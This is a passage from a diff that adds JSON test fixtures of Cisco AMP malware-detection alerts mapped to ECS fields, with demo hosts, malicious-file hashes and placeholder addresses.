654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251503560262000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261637",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:36.000Z",
+            "file": {
+                "name": "t.exe",
+                "path": "\\\\?\\C:\\t.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581771127Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251503560262000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261636",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "explorer.exe",
+                "pid": 3164,
+                "hash": {
+                    "sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
+                    "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
+                    "md5": "8b88ebbb05a0e56b7dcc708498c02b3e"
+                }
+            },
+            "@timestamp": "2021-01-15T10:17:36.000Z",
+            "file": {
+                "name": "t.exe",
+                "path": "\\\\?\\C:\\t.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581773027Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251503560262000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251503560261635",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:25.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581774895Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176259028591575000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176259028591575130",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "explorer.exe",
+                "pid": 3164,
+                "hash": {
+                    "sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
+                    "sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
+                    "md5": "8b88ebbb05a0e56b7dcc708498c02b3e"
+                }
+            },
+            "@timestamp": "2021-01-15T10:17:21.000Z",
+            "file": {
+                "name": "t.exe",
+                "path": "\\\\?\\C:\\t.exe",
+                "hash": {
+                    "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
+                    "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "md5": "209a288c68207d57e0ce6e60ebf60729"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_TeslaCrypt"
+                ],
+                "hash": [
+                    "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
+                    "209a288c68207d57e0ce6e60ebf60729",
+                    "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_TeslaCrypt",
+                "hostname": "Demo_TeslaCrypt",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581776799Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251439135752194\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6159251439135752000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.3372C1EDAB-100.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "90:61:b5:c9:13:79",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "90:61:b5:c9:13:79"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6159251439135752194",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:14.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581778666Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258981346935000,\"timestamp\":1610705834,\"timestamp_nanoseconds\":346000000,\"date\":\"2021-01-15T10:17:14+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258981346934873\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176258981346935000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176258981346934873",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:17:02.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581780563Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258929807327000,\"timestamp\":1610705822,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:02+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258929807327320\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176258929807327000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176258929807327320",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:14:55.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581782448Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533668103677542000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533668103677542427",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:14:55.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
